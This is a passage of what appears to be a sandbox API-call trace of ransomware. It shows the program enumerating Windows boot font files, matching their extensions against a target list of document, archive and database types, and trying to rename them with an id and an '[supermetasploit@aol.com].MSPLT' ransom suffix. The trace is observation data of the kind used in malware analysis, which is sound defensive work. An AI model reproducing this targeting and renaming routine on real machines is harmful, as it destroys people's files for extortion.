(lpString="C:\\Boot\\Fonts\\chs_boot.ttf") returned 26 [0285.971] lstrlenW (lpString=".jpg") returned 4 [0285.971] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.972] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.972] lstrlenW (lpString="cht_boot.ttf") returned 12 [0285.972] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.974] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=3878410) returned 1 [0285.974] CloseHandle (hObject=0x3e4) returned 1 [0285.974] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0285.974] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.974] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0285.974] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.974] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.974] lstrlenW (lpString=".doc") returned 4 [0285.974] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.974] lstrlenW (lpString=".docx") returned 5 [0285.974] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.974] lstrlenW (lpString=".pdf") returned 4 [0285.974] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.974] lstrlenW (lpString=".xls") returned 4 [0285.975] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.975] lstrlenW (lpString=".xlsx") returned 5 [0285.975] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.975] lstrlenW (lpString=".ppt") returned 4 [0285.975] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString=".zip") returned 4 [0285.975] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.975] lstrlenW (lpString=".rar") returned 4 [0285.975] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString=".bz2") returned 4 [0285.975] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString=".7z") returned 3 [0285.975] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString=".dbf") returned 4 [0285.975] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString=".1cd") returned 4 [0285.975] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString=".jpg") returned 4 [0285.975] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.975] lstrlenW (lpString=".doc") returned 4 [0285.975] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.975] lstrlenW (lpString=".docx") returned 5 [0285.975] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.975] lstrlenW (lpString=".pdf") returned 4 [0285.976] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString=".xls") returned 4 [0285.976] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.976] lstrlenW (lpString=".xlsx") returned 5 [0285.976] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.976] lstrlenW (lpString=".ppt") returned 4 [0285.976] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.976] lstrlenW (lpString=".zip") returned 4 [0285.976] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.976] lstrlenW (lpString=".rar") returned 4 [0285.976] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString=".bz2") returned 4 [0285.976] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString=".7z") returned 3 [0285.976] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.976] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.976] lstrlenW (lpString=".dbf") returned 4 [0285.976] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.976] lstrlenW (lpString=".1cd") returned 4 [0285.976] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.976] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0285.976] lstrlenW (lpString=".jpg") returned 4 [0285.976] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.976] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.976] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0285.976] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.979] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=1985867) returned 1 [0285.979] CloseHandle (hObject=0x3e4) returned 1 [0285.979] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0285.979] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.979] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0285.979] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.979] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.979] lstrlenW (lpString=".doc") returned 4 [0285.979] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.979] lstrlenW (lpString=".docx") returned 5 [0285.980] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.980] lstrlenW (lpString=".pdf") returned 4 [0285.980] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString=".xls") returned 4 [0285.980] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.980] lstrlenW (lpString=".xlsx") returned 5 [0285.980] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.980] lstrlenW (lpString=".ppt") returned 4 [0285.980] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString=".zip") returned 4 [0285.980] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.980] lstrlenW (lpString=".rar") returned 4 [0285.980] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString=".bz2") returned 4 [0285.980] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString=".7z") returned 3 [0285.980] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString=".dbf") returned 4 [0285.980] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString=".1cd") returned 4 [0285.980] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString=".jpg") returned 4 [0285.980] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.980] lstrlenW (lpString=".doc") returned 4 [0285.980] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.980] lstrlenW (lpString=".docx") returned 5 [0285.980] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.980] lstrlenW (lpString=".pdf") returned 4 [0285.981] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString=".xls") returned 4 [0285.981] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.981] lstrlenW (lpString=".xlsx") returned 5 [0285.981] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.981] lstrlenW (lpString=".ppt") returned 4 [0285.981] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.981] lstrlenW (lpString=".zip") returned 4 [0285.981] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.981] lstrlenW (lpString=".rar") returned 4 [0285.981] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString=".bz2") returned 4 [0285.981] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString=".7z") returned 3 [0285.981] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.981] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.981] lstrlenW (lpString=".dbf") returned 4 [0285.981] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.981] lstrlenW (lpString=".1cd") returned 4 [0285.981] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.981] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0285.981] lstrlenW (lpString=".jpg") returned 4 [0285.981] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.981] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.981] lstrlenW (lpString="kor_boot.ttf") returned 12 [0285.981] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.983] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=2373000) returned 1 [0285.983] CloseHandle (hObject=0x3e4) returned 1 [0285.984] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0285.984] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.984] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0285.984] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.984] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.984] lstrlenW (lpString=".doc") returned 4 [0285.984] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.984] lstrlenW (lpString=".docx") returned 5 [0285.984] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.984] lstrlenW (lpString=".pdf") returned 4 [0285.984] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.984] lstrlenW (lpString=".xls") returned 4 [0285.984] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.984] lstrlenW (lpString=".xlsx") returned 5 [0285.984] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.984] lstrlenW (lpString=".ppt") returned 4 [0285.985] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString=".zip") returned 4 [0285.985] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.985] lstrlenW (lpString=".rar") returned 4 [0285.985] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString=".bz2") returned 4 [0285.985] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString=".7z") returned 3 [0285.985] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString=".dbf") returned 4 [0285.985] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString=".1cd") returned 4 [0285.985] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString=".jpg") returned 4 [0285.985] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.985] lstrlenW (lpString=".doc") returned 4 [0285.985] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.985] lstrlenW (lpString=".docx") returned 5 [0285.986] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.986] lstrlenW (lpString=".pdf") returned 4 [0285.986] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString=".xls") returned 4 [0285.986] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.986] lstrlenW (lpString=".xlsx") returned 5 [0285.986] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.986] lstrlenW (lpString=".ppt") returned 4 [0285.986] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.986] lstrlenW (lpString=".zip") returned 4 [0285.986] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.986] lstrlenW (lpString=".rar") returned 4 [0285.986] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString=".bz2") returned 4 [0285.986] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString=".7z") returned 3 [0285.986] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.986] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.986] lstrlenW (lpString=".dbf") returned 4 [0285.986] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.986] lstrlenW (lpString=".1cd") returned 4 [0285.986] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.986] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0285.986] lstrlenW (lpString=".jpg") returned 4 [0285.986] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0285.987] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.987] lstrlenW (lpString="malgunn_boot.ttf") returned 16 [0285.987] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.989] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=174959) returned 1 [0285.989] CloseHandle (hObject=0x3e4) returned 1 [0285.989] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0285.989] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.989] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.989] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0285.989] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0285.989] lstrlenW (lpString=".doc") returned 4 [0285.989] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0285.990] lstrlenW (lpString=".docx") returned 5 [0285.990] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0285.990] lstrlenW (lpString=".pdf") returned 4 [0285.990] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0285.990] lstrlenW (lpString=".xls") returned 4 [0285.990] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0285.990] lstrlenW (lpString=".xlsx") returned 5 [0285.990] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0285.990] lstrlenW (lpString=".ppt") returned 4 [0285.990] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0285.990] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0285.990] lstrlenW (lpString=".zip") returned 4 [0285.990] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0285.990] lstrlenW (lpString=".rar") returned 4 [0285.990] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0285.990] lstrlenW (lpString=".bz2") returned 4 [0285.990] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.990] lstrlenW (lpString=".7z") returned 3 [0285.990] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.990] lstrlenW (lpString="C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 30 [0285.990] lstrlenW (lpString=".dbf") returned 4 [0285.990] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.991] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.991] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.993] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=177414) returned 1 [0285.993] CloseHandle (hObject=0x3e4) returned 1 [0285.993] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0285.993] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.993] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.993] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.993] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.996] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=143754) returned 1 [0285.996] CloseHandle (hObject=0x3e4) returned 1 [0285.996] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0285.997] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.997] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.997] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0285.997] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0285.999] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=145419) returned 1 [0285.999] CloseHandle (hObject=0x3e4) returned 1 [0285.999] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0285.999] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.000] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.000] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.000] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.000] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=162331) returned 1 [0286.000] CloseHandle (hObject=0x3e4) returned 1 [0286.001] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0286.001] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.001] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.001] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.001] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.063] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=164347) returned 1 [0286.063] CloseHandle (hObject=0x3e4) returned 1 [0286.063] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 0x20 [0286.063] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.063] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.064] Sleep (dwMilliseconds=0x64) [0286.300] Sleep (dwMilliseconds=0x64) [0286.491] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.491] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.491] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.491] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=76128) returned 1 [0286.491] CloseHandle (hObject=0x348) returned 1 [0286.491] GetFileAttributesW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui")) returned 0x20 [0286.491] GetFileAttributesW 